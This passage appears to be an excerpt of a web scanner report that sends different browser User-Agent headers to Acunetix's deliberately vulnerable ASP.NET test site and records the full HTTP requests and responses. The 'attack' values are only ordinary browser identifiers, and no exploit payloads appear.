href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Show / hide Request and Response
Request Header - size: 183 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=nblnu4qvewoiimzrtmpquc45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Show / hide Request and Response
Request Header - size: 183 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uaupra2jknsmdwetq0l2r1e2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
